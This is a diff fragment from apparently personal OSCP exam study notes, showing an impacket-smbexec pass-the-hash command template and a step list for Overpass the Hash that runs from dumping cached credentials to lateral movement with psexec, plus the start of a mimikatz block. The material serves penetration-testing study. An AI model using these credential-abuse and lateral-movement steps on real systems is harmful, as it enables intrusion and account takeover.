ezra-fast/OSCPNotes/Commands by Purpose.md

 impacket-smbexec -hashes <LM>:<NT> Administrator@<target-IP>
 ```

-5. Overpass the Hash:                (admin on the local machine)
+5. Overpass the Hash:                (admin on the local machine; this requires the target user's password or NTLM hash)
 	1. dump cached credentials >> PtH locally to get powershell as the target (local) user >> perform some kind of network auth to cache kerberos tickets >> use psexec64.exe in the powershell session with the cached tickets to move laterally
 ```
 privilege::debug